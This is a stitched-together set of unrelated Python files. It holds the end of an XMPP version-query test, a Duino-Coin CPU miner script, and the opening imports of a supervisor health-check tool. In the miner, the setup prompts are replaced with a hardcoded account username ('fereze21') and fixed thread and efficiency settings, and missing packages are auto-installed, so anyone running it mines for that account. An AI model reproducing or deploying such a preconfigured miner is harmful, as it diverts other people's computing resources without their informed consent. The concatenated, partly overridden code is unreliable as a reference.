results.append((r['software_version']['name'],
r['software_version']['version'],
r['software_version']['os']))
self.stream_start(mode='client', plugins=['xep_0030', 'xep_0092'])
t = threading.Thread(target=query)
t.start()
self.send("""
<iq type="get" id="1" to="foo@bar">
<query xmlns="jabber:iq:version" />
</iq>
""")
self.recv("""
<iq type="result" id="1" from="foo@bar" to="tester@localhost">
<query xmlns="jabber:iq:version">
<name>Foo</name>
<version>1.0</version>
<os>Linux</os>
</query>
</iq>
""")
t.join()
expected = [('Foo', '1.0', 'Linux')]
self.assertEqual(results, expected,
"Did not receive expected results: %s" % results)
suite = unittest.TestLoader().loadTestsFromTestCase(TestStreamSet)
|
pc.py
|
#!/usr/bin/env python3
##########################################
# Duino-Coin Python PC Miner (v2.5.6)
# https://github.com/revoxhere/duino-coin
# Distributed under MIT license
# © Duino-Coin Community 2019-2021
##########################################
# Import libraries
import sys
from configparser import ConfigParser
from datetime import datetime
from hashlib import sha1
from json import load as jsonload
from locale import LC_ALL, getdefaultlocale, getlocale, setlocale
from os import _exit, execl, mkdir
from os import name as osname
from os import environ as osenviron
from platform import machine as osprocessor
from os import path, system
from os import system as ossystem
from pathlib import Path
from platform import system as plsystem
from re import sub
from signal import SIGINT, signal
from socket import socket
from statistics import mean
from subprocess import DEVNULL, Popen, check_call
from threading import Thread as thrThread
from time import ctime, sleep, strptime, time
from multiprocessing import Lock
from random import choice
import pip
import select
thread_lock = Lock()
def install(package):
try:
pip.main(["install", package])
except AttributeError:
check_call([sys.executable, '-m', 'pip', 'install', package])
execl(sys.executable, sys.executable, *sys.argv)
def now():
# Return datetime object
return datetime.now()
try:
# Check if cpuinfo is installed
import cpuinfo
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Cpuinfo is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"py-cpuinfo\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("py-cpuinfo")
try:
# Check if requests is installed
import requests
except ModuleNotFoundError:
print(
now().strftime('%H:%M:%S ')
+ 'Requests is not installed. '
+ 'Miner will try to install it. '
+ 'If it fails, please manually install "requests" python3 package.'
+ '\nIf you can\'t install it, use the Minimal-PC_Miner.')
install('requests')
try:
# Check if colorama is installed
from colorama import Back, Fore, Style, init
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Colorama is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"colorama\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("colorama")
try:
# Check if pypresence is installed
from pypresence import Presence
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Pypresence is not installed. "
+ "Miner will try to install it. "
+ "If it fails, please manually install \"pypresence\"."
+ "\nIf you can\'t install it, use the Minimal-PC_Miner.")
install("pypresence")
try:
# Check if xxhash is installed
import xxhash
xxhash_enabled = True
except ModuleNotFoundError:
print(
now().strftime("%H:%M:%S ")
+ "Xxhash is not installed - "
+ "Xxhash support will be disabled")
xxhash_enabled = False
# Global variables
MINER_VER = "2.56" # Version number
NODE_ADDRESS = "server.duinocoin.com"
AVAILABLE_PORTS = [
2813, # PC (1)
2814, # PC (2)
2815, # PC (3)
2812, # Wallets, other miners
2811 # Legacy
]
SOC_TIMEOUT = 45 # Socket timeout
PERIODIC_REPORT_TIME = 60
RESOURCES_DIR = "PCMiner_" + str(MINER_VER) + "_resources"
donatorrunning = False
debug = "n"
discord_presence = "y"
rig_identiier = "None"
requested_diff = "NET"
algorithm = "DUCO-S1"
config = ConfigParser()
donation_level = 0
thread = []
totalhashrate_mean = []
mining_start_time = time()
# Create resources folder if it doesn't exist
if not path.exists(RESOURCES_DIR):
mkdir(RESOURCES_DIR)
# Check if languages file exists
if not Path(RESOURCES_DIR + "/langs.json").is_file():
url = ("https://raw.githubusercontent.com/"
+ "revoxhere/"
+ "duino-coin/master/Resources/"
+ "PC_Miner_langs.json")
r = requests.get(url)
with open(RESOURCES_DIR + "/langs.json", "wb") as f:
f.write(r.content)
# Load language file
with open(RESOURCES_DIR + "/langs.json", "r", encoding="utf8") as lang_file:
lang_file = jsonload(lang_file)
# OS X invalid locale hack
if plsystem() == "Darwin":
if getlocale()[0] is None:
setlocale(LC_ALL, "en_US.UTF-8")
# Check if miner is configured, if it isn't, autodetect language
try:
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
locale = getdefaultlocale()[0]
if locale.startswith("es"):
lang = "spanish"
elif locale.startswith("pl"):
lang = "polish"
elif locale.startswith("fr"):
lang = "french"
elif locale.startswith("mt"):
lang = "maltese"
elif locale.startswith("ru"):
lang = "russian"
elif locale.startswith("de"):
lang = "german"
elif locale.startswith("tr"):
lang = "turkish"
elif locale.startswith("pr"):
lang = "portugese"
elif locale.startswith("it"):
lang = "italian"
elif locale.startswith("zh"):
lang = "chinese_simplified"
elif locale.startswith("th"):
lang = "thai"
else:
lang = "english"
else:
# Read language variable from configfile
try:
config.read(RESOURCES_DIR + "/Miner_config.cfg")
lang = config["Duino-Coin-PC-Miner"]["language"]
except Exception:
# If it fails, fallback to english
lang = "english"
except:
lang = "english"
lang = "english"
def getString(string_name):
    # Get string from language file
if string_name in lang_file[lang]:
return lang_file[lang][string_name]
elif string_name in lang_file["english"]:
return lang_file["english"][string_name]
else:
return "String not found: " + string_name
def debug_output(text):
# Debug output
if debug == "y":
print(now().strftime(Style.DIM + "%H:%M:%S.%f ") + "DEBUG: " + text)
def title(title):
# disable window title setter when running with nohup
if osenviron.get('_') != '/usr/bin/nohup':
# Set window title
if osname == "nt":
# Windows systems
system("title " + title)
else:
# Most standard terminals
print("\33]0;" + title + "\a", end="")
sys.stdout.flush()
def handler(signal_received, frame):
# SIGINT handler
if current_process().name == "MainProcess":
pretty_print(
"sys0",
getString("sigint_detected")
+ Style.NORMAL
+ Fore.RESET
+ getString("goodbye"),
"warning")
try:
# Close previous socket connection (if any)
socket.close()
except Exception:
pass
_exit(0)
def calculate_uptime(start_time):
    # Check the longest interval first so the hour/minute branches are reachable
    uptime = time() - start_time
    if uptime >= 7200:
        return str(round(uptime // 3600)) + " hours"
    elif uptime >= 3600:
        return str(round(uptime // 3600)) + " hour"
    elif uptime >= 120:
        return str(round(uptime // 60)) + " minutes"
    elif uptime >= 60:
        return str(round(uptime // 60)) + " minute"
    return str(round(uptime)) + " seconds"
def get_prefix(diff: int):
if diff >= 1000000000:
diff = str(round(diff / 1000000000)) + "G"
elif diff >= 1000000:
diff = str(round(diff / 1000000)) + "M"
elif diff >= 1000:
diff = str(round(diff / 1000)) + "k"
return str(diff)
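# For example (sketch): get_prefix(1_250_000) returns "1M", get_prefix(8_400)
# returns "8k", and values below 1000 come back unchanged, e.g. "950".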
# Enable signal handler
signal(SIGINT, handler)
def Greeting():
# Greeting message
global greeting
print(Style.RESET_ALL)
if requested_diff == "LOW":
diffName = getString("low_diff_short")
elif requested_diff == "MEDIUM":
diffName = getString("medium_diff_short")
else:
diffName = getString("net_diff_short")
current_hour = strptime(ctime(time())).tm_hour
if current_hour < 12:
greeting = getString("greeting_morning")
elif current_hour == 12:
greeting = getString("greeting_noon")
elif current_hour > 12 and current_hour < 18:
greeting = getString("greeting_afternoon")
elif current_hour >= 18:
greeting = getString("greeting_evening")
else:
greeting = getString("greeting_back")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Fore.YELLOW
+ Style.BRIGHT
+ getString("banner")
+ Style.RESET_ALL
+ Fore.MAGENTA
+ " (v"
+ str(MINER_VER)
+ ") "
+ Fore.RESET
+ "2019-2021")
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.YELLOW
+ "https://github.com/revoxhere/duino-coin")
if lang != "english":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ lang.capitalize()
+ " translation: "
+ Fore.YELLOW
+ getString("translation_autor"))
try:
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ "CPU: "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(threadcount)
+ "x "
+ str(cpu["brand_raw"]))
except Exception as e:
debug_output("Error displaying CPU message: " + str(e))
if osname == "nt" or osname == "posix":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("donation_level")
+ Style.BRIGHT
+ Fore.YELLOW
+ str(donation_level))
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("algorithm")
+ Style.BRIGHT
+ Fore.YELLOW
+ algorithm
+ " ⚙ "
+ diffName)
if rig_identiier != "None":
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ getString("rig_identifier")
+ Style.BRIGHT
+ Fore.YELLOW
+ rig_identiier)
print(
Style.DIM
+ Fore.YELLOW
+ " ‖ "
+ Style.NORMAL
+ Fore.RESET
+ str(greeting)
+ ", "
+ Style.BRIGHT
+ Fore.YELLOW
+ str(username)
+ "!\n")
def loadConfig():
# Config loading section
global username
global efficiency
global donation_level
global debug
global threadcount
global requested_diff
global rig_identiier
global lang
global algorithm
global SOC_TIMEOUT
global discord_presence
global PERIODIC_REPORT_TIME
# Initial configuration
if not Path(RESOURCES_DIR + "/Miner_config.cfg").is_file():
print(
Style.BRIGHT
+ getString("basic_config_tool")
+ RESOURCES_DIR
+ getString("edit_config_file_warning"))
print(
Style.RESET_ALL
+ getString("dont_have_account")
+ Fore.YELLOW
+ getString("wallet")
+ Fore.RESET
+ getString("register_warning"))
username = "fereze21"
if xxhash_enabled:
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "1"
+ Style.NORMAL
+ " - DUCO-S1 ("
+ getString("recommended")
+ ")")
print(
Style.RESET_ALL
+ Style.BRIGHT
+ Fore.RESET
+ "2"
+ Style.NORMAL
+ " - XXHASH")
algorithm = input(
Style.RESET_ALL
+ Fore.YELLOW
+ getString("ask_algorithm")
+ Fore.RESET
+ Style.BRIGHT)
else:
algorithm = "1"
efficiency = "95"
threadcount = "8"
requested_diff = "2"
rig_identiier = "Hello123"
donation_level = "0"
    # Check whether efficiency is correct
efficiency = sub(r"\D", "", efficiency)
if efficiency == "":
efficiency = 95
elif float(efficiency) > int(100):
efficiency = 100
elif float(efficiency) < int(1):
efficiency = 1
    # Check whether threadcount is correct
threadcount = sub(r"\D", "", threadcount)
if threadcount == "":
threadcount = cpu_count()
elif int(threadcount) > int(8):
threadcount = 8
print(
Style.RESET_ALL
+ Style.BRIGHT
+ getString("max_threads_notice"))
elif int(threadcount) < int(1):
threadcount = 1
    # Check whether algo setting is correct
if algorithm == "2":
algorithm = "XXHASH"
else:
algorithm = "DUCO-S1"
    # Check whether diff setting is correct
if requested_diff == "1":
requested_diff = "LOW"
elif requested_diff == "2":
requested_diff = "MEDIUM"
else:
requested_diff = "MEDIUM"
    # Check whether donation_level is correct
donation_level = sub(r"\D", "", donation_level)
if donation_level == "":
donation_level = 1
elif float(donation_level) > int(5):
donation_level = 5
elif float(donation_level) < int(0):
donation_level = 0
# Format data
config["Duino-Coin-PC-Miner"] = {
"username": username,
"efficiency": efficiency,
"threads": threadcount,
"requested_diff": requested_diff,
"donate": donation_level,
"identifier": rig_identiier,
"algorithm": algorithm,
"language": lang,
"debug": "n",
"soc_timeout": 45,
"periodic_report": 60,
"discord_presence": "y"
}
with open(RESOURCES_DIR + "/Miner_config.cfg", "w") as configfile:
config.write(configfile)
print(Style.RESET_ALL + getString("config_saved"))
else:
# If config already exists, load data from it
config.read(RESOURCES_DIR + "/Miner_config.cfg")
username = config["Duino-Coin-PC-Miner"]["username"]
efficiency = config["Duino-Coin-PC-Miner"]["efficiency"]
threadcount = config["Duino-Coin-PC-Miner"]["threads"]
requested_diff = config["Duino-Coin-PC-Miner"]["requested_diff"]
donation_level = config["Duino-Coin-PC-Miner"]["donate"]
algorithm = config["Duino-Coin-PC-Miner"]["algorithm"]
rig_identiier = config["Duino-Coin-PC-Miner"]["identifier"]
debug = config["Duino-Coin-PC-Miner"]["debug"]
SOC_TIMEOUT = int(config["Duino-Coin-PC-Miner"]["soc_timeout"])
discord_presence = config["Duino-Coin-PC-Miner"]["discord_presence"]
PERIODIC_REPORT_TIME = int(
config["Duino-Coin-PC-Miner"]["periodic_report"])
efficiency = (100 - float(efficiency)) * 0.01
def ducos1(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# DUCO-S1 algorithm
# Measure starting time
timeStart = time()
base_hash = sha1(str(lastBlockHash).encode('ascii'))
temp_hash = None
    # Loop from 0 to 100*diff
for ducos1res in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1res % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
temp_hash = base_hash.copy()
temp_hash.update(str(ducos1res).encode('ascii'))
ducos1 = temp_hash.hexdigest()
# Check if result was found
if ducos1 == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1res / timeDelta
return [ducos1res, hashrate]
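# Illustrative sketch, not part of the original miner and never called by it:
# a local self-check of how a DUCO-S1 job is solved. All values below are made
# up (hypothetical); a real job's lastBlockHash, expectedHash and difficulty
# come from the mining node.
def _ducos1_example():
    from hashlib import sha1 as _sha1
    last_block_hash = "abcdef0123456789"   # hypothetical previous block hash
    secret_nonce = 299999                  # hypothetical solution picked by the "node"
    expected_hash = _sha1(
        (last_block_hash + str(secret_nonce)).encode("ascii")).hexdigest()
    # The nonce can only be found if 100 * difficulty >= secret_nonce
    nonce, hashrate = ducos1(last_block_hash, expected_hash, 3000, 0)
    assert nonce == secret_nonce
    return nonce, hashrate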
def ducos1xxh(
lastBlockHash,
expectedHash,
difficulty,
efficiency):
# XXHASH algorithm
# Measure starting time
timeStart = time()
    # Loop from 0 to 100*diff
for ducos1xxres in range(100 * int(difficulty) + 1):
# If efficiency lower than 100% sleep to use less CPU
if ducos1xxres % 1000000 == 0 and float(100 - efficiency * 100) < 100:
sleep(float(efficiency))
# Generate hash
ducos1xx = xxhash.xxh64(
str(lastBlockHash) + str(ducos1xxres), seed=2811)
ducos1xx = ducos1xx.hexdigest()
# Check if result was found
if ducos1xx == expectedHash:
# Measure finish time
timeStop = time()
# Calculate hashrate
timeDelta = timeStop - timeStart
hashrate = ducos1xxres / timeDelta
return [ducos1xxres, hashrate]
def Thread(
threadid: int,
accepted: int,
rejected: int,
requested_diff: str,
khashcount: int,
username: str,
efficiency: int,
rig_identiier: str,
algorithm: str,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS: str,
NODE_PORT: int):
# Mining section for every thread
start_time = time()
report_shares = 0
while True:
while True:
try:
retry_counter = 0
while True:
try:
if retry_counter >= 3:
debug_output(
'Error connecting after 3 retries, '
+ 'fetching new node IP')
NODE_ADDRESS, NODE_PORT = fetch_pools()
debug_output('Connecting to node ' +
str(NODE_ADDRESS) + ":" + str(NODE_PORT))
soc = socket()
soc.connect((str(NODE_ADDRESS), int(NODE_PORT)))
soc.settimeout(SOC_TIMEOUT)
server_version = soc.recv(100).decode()
if server_version:
break
except Exception as e:
retry_counter += 1
pretty_print("net0",
" Error connecting to mining node: "
+ str(e)
+ ", retrying in 5s",
"error")
sleep(5)
if threadid == 0:
soc.send(bytes("MOTD", encoding="utf8"))
motd = soc.recv(1024).decode().rstrip("\n")
if "\n" in motd:
motd = motd.replace("\n", "\n\t\t")
pretty_print("net" + str(threadid),
" MOTD: "
+ Fore.RESET
+ Style.NORMAL
+ str(motd),
"success")
if threadid == 0:
if float(server_version) <= float(MINER_VER):
# Miner is up-to-date
pretty_print(
"net"
+ str(threadid),
getString("connected")
+ Fore.RESET
+ Style.NORMAL
+ getString("connected_server")
+ str(server_version)
+ ", node: "
+ str(NODE_ADDRESS)
+ ":"
+ str(NODE_PORT)
+ ")",
"success")
else:
# Miner is outdated
pretty_print(
"sys"
+ str(threadid),
getString("outdated_miner")
+ MINER_VER
+ ") -"
+ getString("server_is_on_version")
+ server_version
+ Style.NORMAL
+ Fore.RESET
+ getString("update_warning"),
"warning")
sleep(5)
break
except Exception as e:
# Socket connection error
pretty_print(
"net"
+ str(threadid),
getString("connecting_error")
+ Style.NORMAL
+ Fore.RESET
+ " (net err: "
+ str(e)
+ ")",
"error")
debug_output("Connection error: " + str(e))
sleep(10)
if algorithm == "XXHASH":
using_algo = getString("using_algo_xxh")
else:
using_algo = getString("using_algo")
pretty_print(
"sys"
+ str(threadid),
getString("mining_thread")
+ str(threadid)
+ getString("mining_thread_starting")
+ Style.NORMAL
+ Fore.RESET
+ using_algo
+ Fore.YELLOW
+ str(int(100 - efficiency * 100))
+ "% "
+ getString("efficiency"),
"success")
# Mining section
while True:
try:
while True:
# Ask the server for job
if algorithm == "XXHASH":
soc.sendall(bytes(
"JOBXX,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
else:
soc.sendall(bytes(
"JOB,"
+ str(username)
+ ","
+ str(requested_diff),
encoding="utf8"))
# Retrieve work
job = soc.recv(128).decode().rstrip("\n")
job = job.split(",")
debug_output("Received: " + str(job))
try:
diff = int(job[2])
debug_output(str(threadid) +
"Correct job received")
break
except:
pretty_print("cpu" + str(threadid),
" Node message: "
+ job[1],
"warning")
sleep(3)
while True:
computetimeStart = time()
if algorithm == "XXHASH":
algo_back_color = Back.CYAN
result = ducos1xxh(job[0], job[1], diff, efficiency)
else:
algo_back_color = Back.YELLOW
result = ducos1(job[0], job[1], diff, efficiency)
computetimeStop = time()
computetime = computetimeStop - computetimeStart
debug_output("Thread "
+ str(threadid)
+ ": result found: "
+ str(result[0]))
# Convert to kH/s
threadhashcount = int(result[1] / 1000)
# Add this thread's hash counter
# to the global hashrate counter
hashrates_list[threadid] = threadhashcount
                    # Calculate total hashrate of all threads
sharehashrate = 0
for thread in hashrates_list.keys():
sharehashrate += hashrates_list[thread]
totalhashrate_mean.append(sharehashrate)
# Get average from the last 20 hashrate measurements
totalhashrate = mean(totalhashrate_mean[-20:])
while True:
# Send result of hashing algorithm to the server
soc.sendall(bytes(
str(result[0])
+ ","
+ str(result[1])
+ ","
+ "Official PC Miner ("
+ str(algorithm)
+ ") v"
+ str(MINER_VER)
+ ","
+ str(rig_identiier),
encoding="utf8"))
responsetimetart = now()
feedback = soc.recv(64).decode().rstrip("\n")
responsetimestop = now()
ping = int((responsetimestop - responsetimetart
).microseconds / 1000)
debug_output("Thread "
+ str(threadid)
+ ": Feedback received: "
+ str(feedback)
+ " Ping: "
+ str(ping))
if totalhashrate > 800:
# Format hashcount to MH/s
formattedhashcount = str(
"%03.2f" % round(totalhashrate / 1000, 2)
+ " MH/s")
elif totalhashrate > 100:
# Format for >100 kH/s
formattedhashcount = str(
"%03.0f" % float(totalhashrate)
+ " kH/s")
else:
# Format for small hashrates
formattedhashcount = str(
"%02.1f" % float(totalhashrate)
+ " kH/s")
if (totalhashrate > 1500
and accepted.value % 50 == 0):
pretty_print("sys0",
" " +
getString("max_hashrate_notice"),
"warning")
diff = get_prefix(diff)
if feedback == "GOOD":
# If result was correct
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.GREEN
+ " ⛏"
+ getString("accepted")
+ Fore.RESET
+ str(int(accepted.value))
+ "/"
+ str(int(accepted.value + rejected.value))
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
elif feedback == "BLOCK":
# If block was found
accepted.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Back.RESET
+ Fore.CYAN
+ " ⛏"
+ getString("block_found")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
else:
# If result was incorrect
rejected.value += 1
title(
getString("duco_python_miner")
+ str(MINER_VER)
+ ") - "
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ getString("accepted_shares"))
with thread_lock:
print(
Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ algo_back_color
+ Fore.RESET
+ " cpu"
+ str(threadid)
+ " "
+ Style.BRIGHT
+ Back.RESET
+ Fore.RED
+ " ✗"
+ getString("rejected")
+ Fore.RESET
+ str(accepted.value)
+ "/"
+ str(accepted.value + rejected.value)
+ Fore.YELLOW
+ " ("
+ str(int(
(accepted.value
/ (accepted.value + rejected.value)
* 100)))
+ "%)"
+ Style.NORMAL
+ Fore.RESET
+ " ∙ "
+ str("%05.2f" % float(computetime))
+ "s"
+ Style.NORMAL
+ " ∙ "
+ Fore.BLUE
+ Style.BRIGHT
+ str(formattedhashcount)
+ Fore.RESET
+ Style.NORMAL
+ " ⚙ diff "
+ str(diff)
+ " ∙ "
+ Fore.CYAN
+ "ping "
+ str("%02.0f" % int(ping))
+ "ms")
end_time = time()
elapsed_time = end_time - start_time
if (threadid == 0
and elapsed_time >= PERIODIC_REPORT_TIME):
report_shares = accepted.value - report_shares
uptime = calculate_uptime(mining_start_time)
periodic_report(start_time,
end_time,
report_shares,
totalhashrate,
uptime)
start_time = time()
break
break
except Exception as e:
pretty_print(
"net"
+ str(threadid),
getString("error_while_mining")
+ Style.NORMAL
+ Fore.RESET
+ " (mining err: "
+ str(e)
+ ")",
"error")
debug_output("Error while mining: " + str(e))
sleep(5)
break
def periodic_report(start_time,
end_time,
shares,
hashrate,
uptime):
seconds = round(end_time - start_time)
pretty_print("sys0",
" Periodic mining report (BETA): "
+ Fore.RESET
+ Style.NORMAL
+ "\n\t\t‖ During the last "
+ str(seconds)
+ " seconds"
+ "\n\t\t‖ You've mined "
+ str(shares)
+ " shares ("
+ str(round(shares/seconds, 1))
+ " shares/s)"
+ "\n\t\t‖ With the hashrate of "
+ str(int(hashrate)) + " kH/s"
+ "\n\t\t‖ In this time period, you've solved "
+ str(int(hashrate*seconds))
+ " hashes"
+ "\n\t\t‖ Total miner uptime: "
+ str(uptime), "success")
def pretty_print(message_type, message, state):
# Prints colored output messages
    # net/cpu/sys background
    if message_type.startswith("net"):
        background = Back.BLUE
    elif message_type.startswith("cpu"):
        background = Back.YELLOW
    elif message_type.startswith("sys"):
        background = Back.GREEN
    else:
        background = Back.RESET
# Text color
if state == "success":
color = Fore.GREEN
elif state == "warning":
color = Fore.YELLOW
else:
color = Fore.RED
with thread_lock:
print(Style.RESET_ALL
+ Fore.WHITE
+ now().strftime(Style.DIM + "%H:%M:%S ")
+ Style.BRIGHT
+ background
+ " "
+ message_type
+ " "
+ Back.RESET
+ color
+ Style.BRIGHT
+ message
+ Style.NORMAL
+ Fore.RESET)
def initRichPresence():
# Initialize Discord rich presence
global RPC
try:
RPC = Presence(808045598447632384)
RPC.connect()
debug_output("Discord rich presence initialized")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
def updateRichPresence():
# Update rich presence status
startTime = int(time())
while True:
try:
# Calculate average total hashrate with prefix
totalhashrate = mean(totalhashrate_mean[-20:])
if totalhashrate > 800:
totalhashrate = str(round(totalhashrate / 1000, 2)) + " MH/s"
else:
totalhashrate = str(round(totalhashrate, 1)) + " kH/s"
RPC.update(
details="Hashrate: " + str(totalhashrate),
start=startTime,
state="Acc. shares: "
+ str(accepted.value)
+ "/"
+ str(rejected.value + accepted.value),
large_image="ducol",
large_text="Duino-Coin, "
+ "a coin that can be mined with almost everything, "
+ "including AVR boards",
buttons=[
{"label": "Learn more",
"url": "https://duinocoin.com"},
{"label": "Discord Server",
"url": "https://discord.gg/k48Ht5y"}])
debug_output("Rich presence updated")
except Exception as e:
# Discord not launched
debug_output("Error launching Discord RPC thread: " + str(e))
sleep(15) # 15 seconds to respect Discord rate limit
def get_fastest_connection(server_ip: str):
connection_pool = []
available_connections = []
for i in range(len(AVAILABLE_PORTS)):
connection_pool.append(socket())
connection_pool[i].setblocking(0)
try:
connection_pool[i].connect((server_ip,
AVAILABLE_PORTS[i]))
connection_pool[i].settimeout(SOC_TIMEOUT)
except BlockingIOError as e:
pass
ready_connections, _, __ = select.select(connection_pool, [], [])
while True:
for connection in ready_connections:
try:
server_version = connection.recv(5).decode()
except:
continue
            if not server_version:
                continue
available_connections.append(connection)
connection.send(b'PING')
ready_connections, _, __ = select.select(available_connections, [], [])
ready_connections[0].recv(4)
return ready_connections[0].getpeername()[1]
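# Overview: get_fastest_connection() opens one non-blocking socket per entry in
# AVAILABLE_PORTS, waits with select() for whichever nodes respond first, sends
# a PING to each responsive connection and returns the port of the first node
# that answers, i.e. the lowest-latency port for the given server_ip.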
def fetch_pools():
while True:
pretty_print("net0",
" "
+ getString("connection_search")
+ "...",
"warning")
try:
response = requests.get(
"https://server.duinocoin.com/getPool"
).json()
pretty_print("net0",
" Retrieved mining node: "
+ Fore.RESET
+ Style.NORMAL
+ str(response["name"]),
"success")
NODE_ADDRESS = response["ip"]
NODE_PORT = response["port"]
return NODE_ADDRESS, NODE_PORT
except Exception as e:
pretty_print("net0",
" Error retrieving mining node: "
+ str(e)
+ ", retrying in 15s",
"error")
sleep(15)
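# Overview: fetch_pools() asks the getPool endpoint for a mining node and
# expects a JSON object exposing at least the "name", "ip" and "port" fields
# read above; any error (network failure, unexpected payload) falls into the
# retry branch, and the caller falls back to a hard-coded node if this fails.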
if __name__ == "__main__":
from multiprocessing import freeze_support
freeze_support()
cpu = cpuinfo.get_cpu_info()
title(getString("duco_python_miner") + str(MINER_VER) + ")")
if osname == "nt":
# Unicode fix for windows
ossystem("chcp 65001")
# Colorama
init(autoreset=True)
try:
from multiprocessing import (
Manager,
Process,
Value,
cpu_count,
current_process
)
manager = Manager()
# Multiprocessing globals
khashcount = Value("i", 0)
accepted = Value("i", 0)
rejected = Value("i", 0)
hashrates_list = manager.dict()
totalhashrate_mean = manager.list()
except Exception as e:
print(e)
pretty_print(
"sys0",
" Multiprocessing is not available. "
+ "Please check permissions and/or your python installation. "
+ "Exiting in 10s.",
"error")
sleep(10)
_exit(1)
try:
# Load config file or create new one
loadConfig()
debug_output("Config file loaded")
except Exception as e:
pretty_print(
"sys0",
getString("load_config_error")
+ RESOURCES_DIR
+ getString("load_config_error_warning")
+ Style.NORMAL
+ Fore.RESET
+ " (config load err: "
+ str(e)
+ ")",
"error")
debug_output("Error reading configfile: " + str(e))
sleep(10)
_exit(1)
try:
# Display greeting message
Greeting()
debug_output("Greeting displayed")
except Exception as e:
pretty_print(
"sys0",
"Error displaying greeting message"
+ Style.NORMAL
+ Fore.RESET
+ " (greeting err: "
+ str(e)
+ ")",
"error")
debug_output("Error displaying greeting message: " + str(e))
try:
NODE_ADDRESS, NODE_PORT = fetch_pools()
except Exception:
NODE_ADDRESS = "server.duinocoin.com"
NODE_PORT = 2813
debug_output("Using default server port and address")
try:
for x in range(int(threadcount)):
# Launch duco mining threads
thread.append(x)
thread[x] = Process(
target=Thread,
args=(
x,
accepted,
rejected,
requested_diff,
khashcount,
username,
efficiency,
rig_identiier,
algorithm,
hashrates_list,
totalhashrate_mean,
NODE_ADDRESS,
NODE_PORT))
thread[x].start()
if x > 4 and x % 4 == 0:
# Don't launch burst of threads
# to not get banned
sleep(5)
else:
sleep(0.1)
except Exception as e:
pretty_print(
"sys0",
"Error launching CPU thread(s)"
+ Style.NORMAL
+ Fore.RESET
+ " (cpu launch err: "
+ str(e)
+ ")",
"error")
debug_output("Error launching CPU thead(s): " + str(e))
if discord_presence == "y":
try:
# Discord rich presence threads
initRichPresence()
thrThread(
target=updateRichPresence).start()
except Exception as e:
debug_output("Error launching Discord RPC thead: " + str(e))
|
healthCheck.py
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# @Time : 2020-06-05
# @Author : lework
# @Desc : Health checks for applications managed by supervisor
# @Version : 1.5
import os
import sys
import time
import json
import yaml
import base64
import socket
import signal
import smtplib
import datetime
import platform
import threading
import subprocess
from email.header import Header
from email.mime.text import MIMEText
from collections import namedtuple
from supervisor.xmlrpc import SupervisorTransport
PY3 = sys.version_info[0] == 3
if PY3:
import http.client as httplib
